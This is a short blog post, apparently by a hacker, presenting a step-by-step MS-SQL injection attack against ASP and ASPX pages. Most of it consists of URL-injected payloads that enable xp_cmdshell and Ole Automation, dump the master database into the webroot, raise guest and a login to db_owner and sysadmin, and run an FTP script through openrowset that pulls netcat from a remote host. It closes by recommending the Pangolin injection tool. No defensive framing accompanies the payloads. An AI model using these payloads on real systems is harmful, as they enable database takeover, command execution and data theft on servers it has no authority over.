Ms-Sql Injection Privilege Escalation !

Hi God .

Hi Again My Readers!
[Attention ] : I  Break Long command .
1- In mssql , when your Privilege Is USER or Db_Owner You will can Enable XP_DIRTREE And Dir wanted Drive .

viewdetail.aspx?test=22′;exec+master.dbo.sp_addextendedproc+
+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00–

After Enable , You Can Execute Xp_dirtree and save Result In Database & view It.

2- Enable Execute in Administrator Privilege Without Execute Permission :

Enable XP_EXC:

viewdetail.aspx?test=22′;EXEC+sp_configure+
+’show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

Enable OS_EX

viewdetail.aspx?test=22′;exec sp_configure ‘show advanced options’,1;RECONFIGURE;
exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;

After Execute :

viewdetail.aspx?test=22′;EXEC xp_cmdshell ‘ping 127.0.0.1′ ;

3- Back UP From Database :

viewdetail.aspx?test=22”+BACKUP database master to disk=’d:\Inetpub\wwwroot\1.zip’;–

4- GUEST = DB_OWNER :

/FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’
exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”guest”’,'xx’ exec sp_executesql N’drop view dbo.test’–

5 – ADDIN TO “BUILTIN\ADMINISTRATORS”

FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name=”BUILTIN\ADMINISTRATORS”’,'xx’ exec sp_executesql N’drop view dbo.test’–

and then :

FullStory.asp?id=1;exec master..sp_addsrvrolemember ‘nhaxinh’,sysadmin –

ENABLE OPENROWSET/OLEDB :

FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

6- Open Remote Link :

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

7 – UPLOAD NETCAT or …

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’, ‘server=UNESCO;uid=BUILTIN\Administrators;pwd=’,'set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f” & del f’)– (> == “>”)

Code:

echo open a.b.c.d >f

echo user a a >>f

echo bin >> f

echo cd a >>f

echo mget * >>f

echo quit >>f

ftp -v -i -n -s:f

del f

Another Way? !

You Can use PANGOLIN , it is good Sql injector with bypass some Protection :

Download :

http://www.nosec.org/

Enjoy .

Daphne .

Comments are closed.

Categories


Get Adobe Flash player